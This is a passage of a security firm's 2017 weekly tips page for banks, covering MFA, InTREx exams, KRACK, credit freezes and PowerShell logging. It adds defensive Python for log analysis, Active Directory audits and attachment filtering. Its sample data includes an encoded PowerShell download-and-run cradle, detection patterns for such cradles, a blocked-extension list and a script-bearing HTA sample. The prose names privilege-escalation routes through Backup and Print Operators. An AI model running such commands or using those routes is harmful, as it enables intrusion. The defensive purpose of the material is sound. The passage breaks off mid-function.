Security Tips

11/21/17

Thanksgiving Top 10 List

It's a short week, and everyone at 10-D is focused on the upcoming holiday feast. So this week's tip is admittedly a little short on "security" but will hopefully still help you avoid a crisis if you have a holiday turkey fail.

(With apologies to David Letterman and the Butterball Turkey Hotline.)

Top 10 Emergency Turkey Substitutions

Happy Thanksgiving! And please, share any turkey fails you witness, but please change names to protect the innocent;)

11/16/17

Multi-Factor Authentication: Not horseshoes or grenades; Close does not count.

Time and time again, the question is asked, "Are you using multi-factor authentication (MFA) for that?" When the answer is "Yes", it is often followed by "We use a username and password, followed by a series of security questions." However, this is not multi-factor authentication. It does not matter whether you enter fourteen different passwords, security answers, PINs or any combination of them; if everything you present is something you know, it is still one factor.

What is MFA?

Multi-factor authentication, of which two-factor authentication (2FA) is the most common form, is a security control that requires the user to present two or more forms of evidence (credentials) when logging into an account. These credentials must fall into two or more of the following categories:

Something you know (a password, PIN or security answer); something you have (a phone running an authenticator app, a hardware token, a smart card); something you are (a fingerprint or other biometric).

A user's credentials must come from at least two of these categories to be considered multi- or two-factor authenticated. For example, if a user logs into their bank account, which has MFA enabled, the user would be required to enter a username and password. Then, as a second factor, the user would use an authenticator application (soft token), usually on the user's phone, that generates a one-time password (OTP). The OTP is not random: it is computed from a secret shared between the app and the bank plus the current time, which is why it is only valid for a pre-set time frame (typically 30 seconds) and must be entered within that window before access is granted.

MFA protects critical banking assets and data by adding that additional layer of security, which makes it much harder for would-be attackers to get in. In the above example, for your account to be compromised the attacker would have to obtain both your username and password and your mobile device (really, the secret stored in its soft token). The one caveat: a phishing page that relays your username, password and current OTP to the real site in real time still works, because the code is valid for anyone who presents it within its window. MFA raises the bar considerably, but users still need to check where they are typing a code.

Eliminating online crime is unrealistic, but this type of control dramatically reduces the risk of data theft, even in the event your username and password are stolen. MFA should be used whenever possible, especially for your most sensitive data.

11/9/17

InTREx - Are you ready for this new exam program?

More and more banks report having been through the FDIC's new Information Technology Risk Examination (InTREx) process. The feedback on the street from banks that have gone through an InTREx exam ranges from "It wasn't too bad" to "I've had medical procedures that were less invasive!" Some state banking regulatory agencies also appear to be adopting portions of the InTREx program into their own examinations, and we believe the OCC may adopt components of the InTREx process in the not-too-distant future.

Our observations of institutions that have recently gone through an InTREx exam indicate a more detailed evaluation than we have seen in the past. One of the biggest differences is the time and depth of questioning, with 120 to 160 hours of IT examiner time being reported. That may be 3 to 4 times the on-site examination hours institutions had experienced before.

Findings from these examinations indicate the breadth of the IT examination has also increased. For example, examiners have asked for an inventory of all software installed at the bank and whether each product is still supported by its vendor. We are also hearing of more in-depth reviews of user permissions for ancillary applications used throughout the institution (e.g., who has access to document imaging and to which documents, or who can perform loan maintenance). In addition, specific terms within vendor contracts have been scrutinized, as well as detailed reviews of firewall configurations.

For everyone that thought audits from 10-D Security were tough, now the examiners are rolling up their sleeves and digging in, too. For the foreseeable future we expect they will continue to up their game in evaluating institutions' information security.

ISOs should sit up and pay attention to the new InTREx examination process and what it means to their institution.

BTW: InTREx Survival is just one area of training and preparation that is a part of the ISO Certification Program at 10-D Academy.

For more information, visit: https://www.10dsecurity.com/opencarta/index.php

11/2/17

Another reminder that passwords are not enough

Building on the success of the "Carbanak" cyber-criminal group, a new banking Trojan has been identified that further automates the types of attacks that by some estimates netted the Carbanak gang more than $1 billion in the past few years. Carbanak gained notoriety by targeting financial institutions directly, rather than their customers. By compromising internal bank systems and observing employee procedures, they were able to use a bank's own applications to perform fraudulent transfers.

The new banking Trojan, named "Silence," facilitates these types of attacks by sending virtual screen capture "videos" back to the attackers, so they can observe, in almost real-time, how the bank is operating and how employees use the core applications that the attacker will ultimately use to carry out their theft.

The lesson is that skilled attackers make far more money attacking banks directly, so we should expect this type of attack to continue and mature. Banks must design internal security controls and procedures that assume an attacker already has access to one or more internal systems. In practice that means protecting as many critical internal applications as possible with strong multi-factor authentication, so that if an attacker steals a user's password to the core application they still need a one-time password (OTP) or some other short-lived value to conduct sensitive operations. Screen recording also means the attacker sees exactly what the employee types, which is one more reason a static second password or security question is not a second factor.

10/26/17

Laptop and security in the same sentence, is that possible?

Laptops are a source of anxiety for many Information Security Officers, as they present challenges that desktop workstations do not. Because they are portable and travel with us, they are exposed to a variety of threats: being lost or stolen, or physically damaged by being dropped or getting wet. They also connect to some of the finest wireless services, like hotel and airport networks; what could possibly go wrong? Users also tend to visit websites on their laptops that they would not visit on the company's workstations, and many corporate laptop users admit to letting family members use them for personal purposes.

If that weren't enough, examiners seem to get a little cranky when dealing with an institution's laptop controls.

Recommendation:

Passwords; Encryption; Anti-Malware; Identification Tags; Locks & Cables; Privacy Screens; VPN and Travel Routers.

To help out, 10-D Security presents a new blog post, "Top 5 Laptop Security Tips", to help keep your laptops safe.

10/19/17

Train your employees how to be mean…(it's not what you think!)

Overall, Americans are a friendly bunch (OK OK…forget about that other driver on the way to the office this morning…). We train our staff to be helpful and pleasant, especially those in positions that interact with customers or the public. Unfortunately, the bad guys know this, and a huge reason many social engineering attacks work is that, generally, we want to be nice and helpful. It is one thing to hold a lunch-and-learn about physical security, tell your staff not to let someone follow them through a locked door, and watch everyone nod in agreement…but it is another thing when they are actually presented with that situation and have to choose between letting someone through or closing the door in their face. The same goes for confronting a stranger wandering around the office. Many will take the path that makes them more comfortable…it just doesn't feel right to let a door close on someone right behind you.

To make this easier, and to make it more likely that staff will follow policy, make sure your training includes specific strategies employees can use to enforce company policy without feeling like a jerk. If people have to make up what to say on the spot, they may choose to just let it go, which is exactly what you don't want. Give them specific things to say and do, such as "I'm sorry, but you will need to use your badge so the security logs don't get confused." or "I'm sure you are allowed in here, but let me take you by the reception desk so we can make sure you get where you need to go."

Thinking and doing are two different things, so make sure your training includes role playing, and ask staff to actually say the appropriate responses out loud a few times so they are more likely to come out correctly in real life. Once you give your staff these tools and skills, they are more likely to use them when needed.

10/16/17

Sure, My Wireless is Secure.

Security researchers have disclosed a flaw in the WPA2 (Wi-Fi Protected Access II) protocol itself that allows an attacker within radio range to force a client to reinstall an already-used encryption key during the handshake and, from there, to decrypt and in some cases forge wireless traffic. The attack has been named KRACK (Key Reinstallation Attack). Because the bug is in the standard rather than in one vendor's implementation, virtually every Wi-Fi client and many access points are affected. The Wi-Fi Alliance, the industry group responsible for Wi-Fi, has responded to the disclosure: "This issue can be resolved through straightforward software updates, and the Wi-Fi industry, including major platform providers, has already started deploying patches to Wi-Fi users." Android, Linux, and Apple patches are forthcoming, and Microsoft has already released a fix in the October 10th monthly update.

What can you do?

Push your vendors for updates, starting with client devices (laptops, phones, IoT), since the attack primarily targets the client side of the handshake. Keep the habits that work everywhere else: traffic protected by TLS (HTTPS) or a VPN stays protected even on a vulnerable Wi-Fi network. And carefully monitor your network for malicious activity.

For additional information, check out https://www.krackattacks.com/

10/12/17

Well, that was fun…let's never do that again!

Information security is sometimes a hard and thankless job. Security and functionality are often at odds and your first crack at making something more secure may break it. We often see controls that have been implemented then quickly disabled because it didn't pass the "scream test" (it broke something, and the users scream!). The admin never tried it again, because it was not a fun experience. This is basic human nature (don't touch the hot stove again!), but we need to resist that tendency. Often the control can be put in place, it may just need additional planning and testing. Try it on a smaller group, review logs, or do some basic troubleshooting to see what broke the first time. Virtualization is an excellent way to quickly generate a test environment for trying out new settings or controls. Once you figure out the basic problem, it can be a lot easier to deploy across the network without problems. Don't give up! Your hard work will one day be the one thing that makes the difference between a stopped attacker and a really bad day.

Remember if it was easy, everyone would be doing it. If you have a horror story about a security control gone wrong share it with us. We love good stories.

10/5/17

This is One Time You Don't Want to Stand Out

People go through life wanting to stand out from the crowd. To be noticed. To be recognized by their peers. Asking, "When will I get my 15 minutes of fame? I'm special and everyone should know it!" However, when it comes to OFAC compliance, there's something to be said for blending in with the crowd.

The Department of the Treasury, which administers the Office of Foreign Assets Control - more commonly known as OFAC in the banking world - routinely publishes notices about those financial institutions, companies and individuals who decided to "stand out from the crowd" by not complying with OFAC sanctions. Most of these bad actors didn't want the attention, but the OFAC spotlight is now shining directly in their face and the outcome is not all that pretty.

Did you know that in 2017, OFAC has assessed almost $118 million in fines and penalties? And we still have another quarter of the year to go! But wait, if you think that's a lot of moola, it's nothing when you look at the $1.2 billion that was assessed in 2014.

Having a strong OFAC compliance program in place is paramount for every financial institution, and the published penalties prove that fines are assessed, not just threatened. Even if your institution has never had a confirmed OFAC hit, it is a good idea to periodically validate that the systems you rely on to screen against the OFAC list are working as intended and returning legitimate results (for example, by running known names from the list through them). That way you can keep the spotlight off of you during your next examination.

To see more information about OFAC fines, visit https://www.treasury.gov/resource-center/sanctions/CivPen/Pages/civpen-index2.aspx

9/28/17

My Report Card? Really Mom, the Dog Ate It!

Identity theft can occur through a variety of methods, and the old-school method is for someone to simply steal your mail before you ever see it. Bank statements, checks, tax information, etc. are all pieces of mail that are a potential gold mine for fraudsters. But how do you know when a piece of mail doesn't make it to you? Believe it or not, the good ol' U.S. Postal Service provides a free service that offers a potential solution: Informed Delivery®. It provides digital images of scheduled mail deliveries, either on the USPS website or sent directly to your email inbox. Sign up for free, then receive a daily email containing scanned images of the front of each letter-sized item you can expect to be delivered that day. The service is not available at all postal locations, as it requires the mail to have been processed through automated processing equipment.

You can check your local availability of Informed Delivery®, and then sign up for it, at https://informeddelivery.usps.com

You might also be able to finally figure out what really happened to the report card that never showed up in the mail…

9/21/17

If You Don't Use It, You Should Lose It.

When's the last time your IT administrator mentioned BOOTP, RIP, NetBIOS, or mDNS/Bonjour as critical to the function of your network? Chances are, they're not needed. On devices such as printers, IP cameras, HVAC sensors, and the myriad IoT (Internet of Things) gadgets being attached to your networks, many obsolete or unnecessary functions, application programming interfaces, and protocols are enabled by default out of the box and left that way until they cause noticeable issues or become the focus of a high-profile breach.

As we often advise our clients regarding users having local PC administrative rights, it's not about what has happened, but what could happen if an issue is left unchecked. A strong information security program isn't just about locking a door; it also means ensuring your protected assets remain in their expected state and available to those that need them. Allowing unnecessary functions to remain enabled within your network may not only present attack vectors, or in some cases, remote access backdoors, but can also flood your seemingly clean network with broadcast traffic which could result in slowness or data loss.

Administratively, keeping your network pipes clean and safe should be governed with descriptive hardening standards for all newly-introduced and existing hardware or services. In support of your information security program, hardening standards checklists should exist and be updated periodically for servers, workstations, and any other device that is connected to your network. For any significant changes that occur in your infrastructure, ensure that a rollback plan is ready in case problems occur. (This should be part of your change control process for IT admins.)

Knowing your technical environment is half the battle, and discovering the obscure functions that need to be cleaned up is a task best performed with network plumbing tools such as internal vulnerability scans and network protocol analyzers (sniffers such as Wireshark). Such tools can alert administrators to vulnerable or unnecessary protocols and show what is currently eating up your network bandwidth. If you're unsure about an entry in a log or the nature of a reported vulnerability, research it, identify its sources and destinations, and track its behavior over time with repeated scans to determine its legitimacy before disabling it.

9/14/17

It's Still Warm Out, But it May be Time for a Freeze

We won't belabor the news you have probably already heard about the recent Equifax breach. There is undoubtedly a lot of fallout yet to occur (read: lawsuits), and unfortunately it will probably include an up-tick in ID theft and credit accounts opened fraudulently. Many people will sign up for credit alerting services, but that's an alarm that only goes off AFTER the theft has occurred and an account has been opened. But there is a proactive alternative.

The three major credit reporting agencies (Experian, TransUnion, and, ahem, Equifax) are required to offer "Security Freeze" protection. With a freeze in place, the agency will not release your credit file to a creditor until you, the account owner, "thaw" it. Since few, if any, creditors will extend credit without first reviewing a credit file, freezing your information should prevent fraudsters from opening new lines of credit with your stolen data. If you sign up for a Security Freeze and later want a creditor to see your file for legitimate reasons, you first have to thaw it with the agency that creditor uses.

The credit reporting agencies may be able to charge a fee for the freezing and thawing services, and you have to set it up individually with each agency. State regulations usually dictate what fees can be charged. If you have been a victim of ID theft (not just the theft of the information, but an attempt at using the stolen info), then most states' rules prevent the credit reporting agencies from charging to place a freeze. For the rest of us, the fee may range from $0 to around $10 for each freeze/thaw request PER agency. As an example, if you wanted to freeze your credit information in the state of Hawaii (maximum of $5 per freeze transaction) then it would be $15 to freeze your information at all three agencies. (Giving in to public pressure, Equifax announced on Sept. 12th they would offer "freeze" service for free through Nov. 21st. Hey Equifax, if you are reading this, you should offer freeze/thaw services for free to everyone affected for at least a year if not permanently. Just saying…)

To find out more about the service and fees for each state go to: http://consumersunion.org/research/consumers-unions-guide-to-security-freeze-protection-2/

To find out if you are one of the lucky folk that Equifax may have leaked data about go to: https://www.equifaxsecurity2017.com/potential-impact/ (BTW, if you checked it earlier and were told your info wasn't compromised you might want to check again. Their list is reported to have changed.)

9/6/17

This Time, Procrastination Won't Pay Off

Conducting an exercise and training on your bank's Incident Response & Reporting program is one of those tasks that is easy to keep on the back burner. Then it becomes time for your exam and you realize you don't have a good response for the examiner when asked "How do you test your Incident Response program?" The solution to save yourself from that stressful moment is by conducting a tabletop exercise that has a scenario built around testing the program, or participate in an externally-facilitated exercise that is designed to evaluate your cybersecurity program.

The Financial Services Information Sharing and Analysis Center (FS-ISAC) conducts an annual "Cyber Attack Against Payments Services" (CAPS) exercise. CAPS is a virtual tabletop exercise that allows you to participate from your own location, without disclosing any confidential information to anyone outside the bank. The CAPS exercise is conducted two times in September each year, and is free for financial services organizations to participate. This year's CAPS exercise will be conducted September 10-11 and then repeated on September 17-18. Yes, those dates are just a few days away so if your organization wishes to participate don't put it off. For more information on this year's CAPS exercise, or to register, go to: http://www2.fsisac.com/l/134411/2017-03-12/26px8j

Free, confidential, and minimal effort to participate. Really, there aren't many good excuses for not participating. That is, unless you are just looking for an effective way of testing your blood pressure come exam time.

8/31/17

PowerShell Gets Enhanced Logging

Microsoft is putting more attention into PowerShell security. Before PowerShell 5.0, for the most part you were limited to event log entries showing that PowerShell had been executed. With the 5.0 release, Microsoft added enhanced logging that records the PowerShell code actually executed, including scripts, de-obfuscated code, command output, and full transcripts of activity. This is huge for the blue team defenders out there.

On the flip side, malicious users and red teams have been using PowerShell more and more, as seen in recent ransomware attacks and attack frameworks. PowerShell is included in all recent Windows operating systems, it's easy to use, and until recently it left very little logging behind. All this may amount to a shift in methods and tactics, as PowerShell attacks become much easier to detect.

Recommendation

Most modern versions of Microsoft Windows can take advantage of the new enhanced logging features: Windows 10 and Server 2016 ship with PowerShell 5, and older supported versions can get it through Windows Management Framework 5.1. Script block logging, module logging and transcription are enabled through Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell), and the resulting events land in the Microsoft-Windows-PowerShell/Operational log (event ID 4104 for script blocks, 4103 for module logging). Make sure those events are forwarded to your SIEM or log collector; a local log an attacker can clear is of limited value. Check out this Microsoft blog for detailed usage: https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
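Turning the logging on is only half the job; someone has to read it. The following is an added example (not from the Microsoft post or from 10-D) of what a blue team does with 4104 script block events once they are collected: long script blocks are written as several events sharing a ScriptBlockId, so the fragments are reassembled in MessageNumber order, any -EncodedCommand blob is decoded (PowerShell's encoding is base64 of UTF-16LE) so the real command is visible, and a handful of heuristics flag the usual download-and-run-in-memory chain. The event XML below is constructed to match the shape Get-WinEvent's ToXml() produces; the script block IDs, paths, URL and the detection patterns are all this example's own.

```python
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_event(block_id, number, total, text, path=""):
    """Constructed 4104 event in the XML shape that Get-WinEvent's .ToXml() returns."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        '<System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>'
        "<Channel>Microsoft-Windows-PowerShell/Operational</Channel></System><EventData>"
        f'<Data Name="MessageNumber">{number}</Data><Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{block_id}</Data><Data Name="Path">{escape(path)}</Data>'
        "</EventData></Event>"
    )


# Constructed sample log. One block is delivered as an -EncodedCommand (the log only
# shows the base64 blob), one is split across two events (MessageTotal=2) that arrive
# out of order, as fragments do in a busy log, and one is benign admin activity.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    make_event("11111111-aaaa-4bbb-8ccc-000000000001", 2, 2,
               "  (New-Object Net.WebClient).DownloadString($u) | Invoke-Expression\n}\n"),
    make_event("22222222-aaaa-4bbb-8ccc-000000000002", 1, 1,
               f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"),
    make_event("11111111-aaaa-4bbb-8ccc-000000000001", 1, 2,
               "function Get-Stuff {\n  param($u)\n",
               path="C:\\Users\\jdoe\\AppData\\Local\\Temp\\x.ps1"),
    make_event("33333333-aaaa-4bbb-8ccc-000000000003", 1, 1,
               "Get-ChildItem C:\\Windows\\Temp | Where-Object Length -gt 1MB"),
]

# Heuristics, not signatures: each one catches a stage of the usual "download and run
# in memory" chain. PowerShell accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc ...), hence the loose first pattern. Tune before alerting on them.
SUSPICIOUS = [
    ("encoded command", re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/]{20,}={0,2}", re.I)),
    ("base64 decode", re.compile(r"FromBase64String", re.I)),
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)),
    ("hidden window", re.compile(r"-w[a-z]*\s+hidden", re.I)),
]


def parse_4104(xml_text):
    """Fields of one 4104 event as a dict; None for any other event ID."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=EVENT_NS) != "4104":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVENT_NS)}
    return {"id": data["ScriptBlockId"], "n": int(data["MessageNumber"]),
            "total": int(data["MessageTotal"]), "text": data["ScriptBlockText"],
            "path": data.get("Path", "")}


def reassemble(events):
    """Join fragments per ScriptBlockId in MessageNumber order; drop incomplete blocks."""
    blocks = defaultdict(lambda: {"parts": {}, "total": 0, "path": ""})
    for ev in filter(None, map(parse_4104, events)):
        b = blocks[ev["id"]]
        b["parts"][ev["n"]] = ev["text"]
        b["total"] = ev["total"]
        b["path"] = b["path"] or ev["path"]
    return {sbid: {"path": b["path"], "text": "".join(b["parts"][i] for i in sorted(b["parts"]))}
            for sbid, b in blocks.items() if len(b["parts"]) == b["total"]}


def decode_encoded_command(text):
    """-EncodedCommand carries base64 of UTF-16LE; recover the real command line."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/]{20,}={0,2})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """ScriptBlockId -> {text, path, decoded, findings} for every complete block."""
    report = {}
    for sbid, block in reassemble(events).items():
        decoded = decode_encoded_command(block["text"])
        haystack = block["text"] + "\n" + (decoded or "")   # match on the decoded form too
        findings = [name for name, rx in SUSPICIOUS if rx.search(haystack)]
        report[sbid] = {**block, "decoded": decoded, "findings": findings}
    return report


if __name__ == "__main__":
    for sbid, r in analyze(SAMPLE_EVENTS).items():
        print(sbid, r["findings"], (r["decoded"] or r["text"].splitlines()[0])[:60])
```

The reassembly step matters more than it looks: an attacker's script block can be thousands of characters, and a pattern that spans two fragments (the function header in one event, the download cradle in the next) is invisible if each event is inspected alone.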

8/24/17

Elite Membership Comes With Risk! (Privileged Groups)

While auditing Active Directory for proper group membership, the focus is usually on the Domain Admin group. That is great, but there is much more to be concerned with when auditing group membership. There are several privileged groups in Active Directory that are super dangerous in the wrong hands.

When auditing group membership, ensure that the accounts in the privileged groups mentioned below are separate from the user's primary account used for day-to-day activities such as Internet browsing and email. Privileged administrative accounts should be used only for their intended purpose: administrative tasks.

Administrators Group Overview

Administrators is a built-in local group that provides full administrative access to an individual computer or, on a domain controller, to the domain itself. Because this group has complete access, be very careful about adding users to it.

Domain Admins is a global group designed to administer all the computers in a domain. It has administrative control over every computer in the domain because it is added to each computer's local Administrators group (and the domain's Administrators group) by default.

Enterprise Admins is a universal group in the forest root domain with administrative control over every domain in the forest, because it is added to each domain's Administrators group by default.

Schema Admins is a universal group in a native-mode domain (a global group in a mixed-mode domain). The group is authorized to make schema changes in Active Directory, which affect the entire forest, so it should normally be empty and populated only for the duration of a planned schema change.

Groups Used by Operators

Users in these operator groups have privileges to perform very specific administrative tasks across the domain and forest of Active Directory. While somewhat limited in overall ability, these types of permissions can be devastating if bad actors get ahold of an account with this level of control.

Account Operators is a built-in group whose members can create and modify most types of accounts, including users, local groups, and global groups, and can log on locally to domain controllers. They cannot modify the administrative groups above (those objects are protected), but the ability to reset passwords on ordinary user and service accounts is more than enough to be dangerous.

Backup Operators is a built-in group that lets a user back up and restore files and directories on workstations and servers in a Windows domain. Members can log on to a computer, back up or restore files, and shut the computer down. Because of the backup and restore privileges the group grants, members can read any file regardless of its permissions and write files on restore. They cannot change file permissions or perform other administrative tasks, but on a domain controller the backup privilege is enough to copy the Active Directory database (ntds.dit) and with it every password hash in the domain, so treat membership as equivalent to Domain Admins.

Print Operators is a built-in group for managing network printers. Members can manage printers in a Windows domain and can log on locally to a domain controller and shut it down. Because printer drivers load into a privileged process and the group holds the privilege to load them, installing a malicious driver is a well-known route from Print Operator to full control of the server.

Server Operators is a built-in group whose members can perform most common server administration tasks on domain controllers: sharing resources, backing up and restoring files, starting and stopping services, and shutting the system down. Since a member can log on to a domain controller and control its services, this group is effectively domain-admin equivalent.

Replicator is a special group used by the legacy file replication service to replicate files and directories in a domain. Only that service's account should ever be a member; on a modern domain it should be empty, and a user appearing in it is a finding in itself.

Note: the specific access/rights these groups have may vary with the flavor (generation) and mode of Active Directory deployed.
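Memberships in these groups are rarely direct; the dangerous ones hide behind nesting (a help-desk group nested into a Tier-0 group that is nested into Domain Admins). The following is an added example, not code from the tip, of the audit it describes: it takes a directory export (here a constructed dictionary of group-to-member lists, roughly what Get-ADGroup -Properties Members or a CSV dump gives you), flattens nested membership with cycle protection, reports the chain of groups that grants each person their rights, and flags principals that also look like everyday accounts. Using a mailbox (mail attribute) as the sign of a day-to-day account is this example's own heuristic; the group names are the ones listed above, the user and group names are made up.

```python
from collections import deque

# Built-in / default privileged groups named in the tip above.
PRIVILEGED_GROUPS = [
    "Administrators", "Domain Admins", "Enterprise Admins", "Schema Admins",
    "Account Operators", "Backup Operators", "Print Operators", "Server Operators",
    "Replicator",
]

# Constructed directory export: group -> direct members (users or nested groups).
# "Helpdesk" is nested into a Tier-0 group and refers back to it, forming a cycle.
SAMPLE_GROUPS = {
    "Administrators": ["Domain Admins", "Enterprise Admins"],
    "Domain Admins": ["adm-jsmith", "Tier0-Admins"],
    "Enterprise Admins": [],
    "Schema Admins": [],
    "Tier0-Admins": ["adm-bwong", "Helpdesk"],
    "Helpdesk": ["jdoe", "Tier0-Admins"],
    "Account Operators": ["Helpdesk"],
    "Backup Operators": ["svc-backup"],
    "Print Operators": [],
    "Server Operators": ["adm-jsmith"],
    "Replicator": [],
}

# Constructed user attributes. A mailbox (mail attribute) is taken as the sign of a
# day-to-day account; that is this example's heuristic, not an Active Directory rule.
SAMPLE_USERS = {
    "adm-jsmith": {"mail": None},
    "adm-bwong": {"mail": None},
    "jdoe": {"mail": "jdoe@example.invalid"},
    "svc-backup": {"mail": None},
}


def effective_members(group, groups):
    """Flatten nested membership. Returns {user: path} where path is the chain of
    groups that grants the membership, e.g. ("Domain Admins", "Tier0-Admins", "Helpdesk").
    Breadth-first with a visited set, so group cycles terminate and the shortest chain wins."""
    members, seen = {}, {group}
    queue = deque([(group, (group,))])
    while queue:
        name, path = queue.popleft()
        for m in groups.get(name, []):
            if m in groups:                       # nested group
                if m not in seen:
                    seen.add(m)
                    queue.append((m, path + (m,)))
            else:                                 # leaf principal (user / service account)
                members.setdefault(m, path)
    return members


def audit(groups, users, privileged=PRIVILEGED_GROUPS):
    """One finding per (user, privileged group). 'shared_account' marks principals that
    also look like everyday accounts and so break the separate-admin-account rule."""
    findings = []
    for g in privileged:
        for user, path in sorted(effective_members(g, groups).items()):
            findings.append({
                "user": user,
                "group": g,
                "via": " > ".join(path),
                "direct": len(path) == 1,
                "shared_account": bool(users.get(user, {}).get("mail")),
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_GROUPS, SAMPLE_USERS):
        flag = "  <-- everyday account holds admin rights" if f["shared_account"] else ""
        print(f"{f['group']:18} {f['user']:12} via {f['via']}{flag}")
```

In the sample, jdoe never appears in a privileged group directly, yet ends up in Administrators, Domain Admins and Account Operators through Helpdesk. That "via" chain is what you want on the audit report: it tells the reviewer which nesting to remove rather than just which person to chase.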

8/17/17

Go Off-Script and Help Stop Malware

For all its faults, the Windows operating system generally just works, even running old software and ancient system tools. One of the ways Microsoft has maintained compatibility with almost everything is by keeping support for arcane file types, to its own detriment. We all know about dangerous executables, such as .EXE and .BAT files. But do you know them all? Attackers love old script-capable formats like .HTA (HTML Application, an HTML page that mshta.exe runs outside the browser's security sandbox with the user's full rights) and .SVG (a vector-graphic format that can carry embedded JavaScript). By default these files, and many others, will execute when opened, but it doesn't have to be that way.

Network administrators can restrict the running of these and other file types in several ways. One of the easiest is to use Group Policy to re-associate these file types with notepad.exe, so that if a user double-clicks one it harmlessly opens in Notepad instead. The nice thing about this approach is that the policy can be filtered to Active Directory groups, so scripts still run for the users who need them, like administrators. The file types you should block vary by environment, but consider restricting the following: .HTA, .JS, .VBS, .SVG. Keep in mind that this only changes what happens on a double-click; a script explicitly launched with wscript.exe, cscript.exe or mshta.exe still runs, so pair it with application control where you can.

8/10/17

Dangerous Office Docs - Now Without Macros!

One of the most common attack vectors we see is tainted Microsoft Office documents. Usually Word, Excel, or PowerPoint files, these documents almost always carry a macro or exploit that, if executed, gives an attacker a foothold in your environment. Fortunately, documents from these programs that originate outside your organization (downloaded from the Internet or received as email attachments) open in Protected View by default. This removes most of the teeth from whatever is lurking in them, because the user has to actively leave Protected View before the content can run.

Research by Matt Nelson found a way around this. Publisher and OneNote do not implement Protected View, so malicious content embedded in their files is not neutered on open, and the files are not caught (initially) by most antivirus and email filters. The effects of these payloads are limited only by the attacker's imagination. 10-D's team of engineers has used this technique during our Penetration Tests and can testify to its effectiveness. Even services like Gmail allow these attachments through, where attachments containing macros are blocked.

What can be done to protect against this? Blocking Publisher (.pub) and OneNote (.one) files at your mail gateway and web proxy is a great start if you do not use those programs. If you do, user training on the dangers of opening files sent to them from the Internet is the best defense. For a deeper dive into the technical details of this attack vector, see Matt Nelson's post at enigma0x3.net.
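The two tips above (the script-capable file types on 8/17 and the Publisher/OneNote files here) both come down to the same gateway rule, so here is one added example, not code from either tip, of how a mail or proxy filter should apply it. Two details matter beyond a list of extensions: Windows decides the handler by the last extension only, ignoring trailing dots, so "invoice.pdf.hta" is an HTA; and an extension is trivially renamed, so the filter also looks at content. The OneNote signature is the file-type GUID from Microsoft's [MS-ONESTORE] specification serialised little-endian, and the OLE compound header is the one shared by .pub and the legacy binary Office formats. The sample attachments are constructed; only their leading bytes matter.

```python
import re

# File types the two tips above single out: formats that run script when double-clicked,
# and the two Office formats that have no Protected View.
BLOCKED_EXTENSIONS = {".hta", ".js", ".vbs", ".svg", ".pub", ".one"}

# Content signatures, checked on the leading bytes so a renamed file is still recognised.
# The OneNote header GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3} is serialised little-endian.
ONENOTE_MAGIC = bytes.fromhex("E4525C7B8CD8A74DAEB15378D02996D3")
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")          # OLE compound file: .pub, legacy .doc/.xls/.ppt, .msg
OLE_EXTENSIONS = {".pub", ".doc", ".xls", ".ppt", ".msg"}


def extension_of(name: str) -> str:
    """The extension as the Windows shell sees it: trailing dots and spaces are dropped,
    and only the last one counts ("invoice.pdf.hta" is an HTA whatever its icon says)."""
    base = name.rstrip(". ").lower()
    dot = base.rfind(".")
    return base[dot:] if dot > 0 else ""


def sniff(data: bytes) -> str:
    """Coarse content type from the first bytes."""
    if data.startswith(ONENOTE_MAGIC):
        return "onenote"
    if data.startswith(OLE_MAGIC):
        return "ole"
    if re.search(rb"<svg[\s>]", data[:1024], re.I):
        return "svg"
    return "other"


def evaluate(name: str, data: bytes) -> dict:
    """Block on extension first, then on content that contradicts the extension."""
    ext, kind = extension_of(name), sniff(data)
    reasons = []
    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"extension {ext} is blocked")
    if kind == "onenote" and ext != ".one":
        reasons.append("OneNote content hiding under a different extension")
    if kind == "svg" and ext != ".svg":
        reasons.append("SVG content hiding under a different extension")
    if kind == "ole" and ext not in OLE_EXTENSIONS:
        reasons.append(f"OLE compound file does not match extension {ext or '(none)'}")
    return {"name": name, "extension": ext, "content": kind,
            "verdict": "block" if reasons else "allow", "reasons": reasons}


# Constructed sample attachments (only the headers matter for the checks above).
SAMPLE_ATTACHMENTS = [
    ("report.one", ONENOTE_MAGIC + b"\x00" * 32),
    ("notes.txt", ONENOTE_MAGIC + b"\x00" * 32),                    # a renamed .one
    ("invoice.pdf.hta", b"<html><head><hta:application/></head><script>new ActiveXObject('WScript.Shell')</script></html>"),
    ("logo.svg", b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'),
    ("SETUP.HTA.", b"<html></html>"),                               # trailing dot, upper case
    ("flyer.pub", OLE_MAGIC + b"\x00" * 32),
    ("memo.doc", OLE_MAGIC + b"\x00" * 32),                         # legacy Word: Protected View territory
    ("budget.xlsx", b"PK\x03\x04" + b"\x00" * 32),
    ("readme.txt", b"Just text."),
]


def run_policy(attachments=SAMPLE_ATTACHMENTS):
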